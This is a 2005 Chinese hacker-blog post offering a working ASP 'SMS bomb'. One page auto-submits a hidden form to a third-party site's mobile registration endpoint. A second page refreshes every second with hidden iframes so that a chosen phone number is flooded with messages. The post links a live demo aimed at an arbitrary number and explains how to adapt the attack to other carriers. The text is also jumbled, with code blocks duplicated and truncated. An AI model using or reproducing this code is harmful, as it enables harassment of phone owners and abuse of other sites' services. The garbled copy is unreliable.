2005-11-26 12:17:46 by: h4x0r
ASP实现手机短信攻击(转自fhord100%可用)
整个攻击过程实现也就两个文件boom.asp及index.asp
其中boom.asp代码为
<form method="POST" action="http://www.73333.com/shouji/Submit.asp?union=73333
就可以了.
然后只要
/index.asp?num=139657***** 这样的就可以达到攻击效果了
我做的一个演示
http://www.ciker.org/test/index.asp?num=13965788888
不知道谁的手机号..随便写的..
最近会加一功能,,限制某个手机不能攻击..噶噶..要不自己的被攻击了就不好了....
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=190
其中boom.asp代码为
<%
dim phone
phone =request.querystring("num")
if not phone = "" then
%>
<html>
<head>
<meta http-equiv="Pragma" contect="no-cache">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body>
<form method="POST" action="http://www.73333.com/shouji/Submit.asp?union=73333" name=&qu ... "return valid_regnow()">
<div align="center">手机号码:
<input value="<%=phone%>" onkeypress=isnum(); id=txtMobile maxLength=11 size=15 name=mobile class="bk">
<script>this.document.forms[0].submit(); </script>
</form>
</body>
</html>
<%
else
response.write "Something Wrong~~~~~~!"
end if
%>
index.asp代码为dim phone
phone =request.querystring("num")
if not phone = "" then
%>
<html>
<head>
<meta http-equiv="Pragma" contect="no-cache">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body>
<form method="POST" action="http://www.73333.com/shouji/Submit.asp?union=73333" name=&qu ... "return valid_regnow()">
<div align="center">手机号码:
<input value="<%=phone%>" onkeypress=isnum(); id=txtMobile maxLength=11 size=15 name=mobile class="bk">
<script>this.document.forms[0].submit(); </script>
</form>
</body>
</html>
<%
else
response.write "Something Wrong~~~~~~!"
end if
%>
<%
dim phone
phone =request.querystring("num")
if not phone = "" then
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta http-equiv="refresh" content="1">
</head>
攻击手机号码:<%=phone%>中......<br>
不关闭此页面.将一直攻击<%=phone%>此号码!<br><br>
<iframe src = boom.asp?num<%=phone%>" width=0 height=0></iframe>
<iframe src = boom.asp?num<%=phone%>" width=0 height=0></iframe>
<iframe src = boom.asp?num<%=phone%>" width=0 height=0></iframe>
<iframe src = boom.asp?num<%=phone%>" width=0 height=0></iframe>
<%
else
response.write "Something Wrong~~~~~~!"
end if
%>
其实也就是利用了http://www.73333.com/这个站点的移动手鸡注册功能来实现的...其他的手机类推..比如联通的..小灵通的..找到一个注册的站点修改boom.asp中的dim phone
phone =request.querystring("num")
if not phone = "" then
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta http-equiv="refresh" content="1">
</head>
攻击手机号码:<%=phone%>中......<br>
不关闭此页面.将一直攻击<%=phone%>此号码!<br><br>
<iframe src = boom.asp?num<%=phone%>" width=0 height=0></iframe>
<iframe src = boom.asp?num<%=phone%>" width=0 height=0></iframe>
<iframe src = boom.asp?num<%=phone%>" width=0 height=0></iframe>
<iframe src = boom.asp?num<%=phone%>" width=0 height=0></iframe>
<%
else
response.write "Something Wrong~~~~~~!"
end if
%>
<form method="POST" action="http://www.73333.com/shouji/Submit.asp?union=73333
就可以了.
然后只要
/index.asp?num=139657***** 这样的就可以达到攻击效果了
我做的一个演示
http://www.ciker.org/test/index.asp?num=13965788888
不知道谁的手机号..随便写的..
最近会加一功能,,限制某个手机不能攻击..噶噶..要不自己的被攻击了就不好了....
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=190
There is no comment on this article.
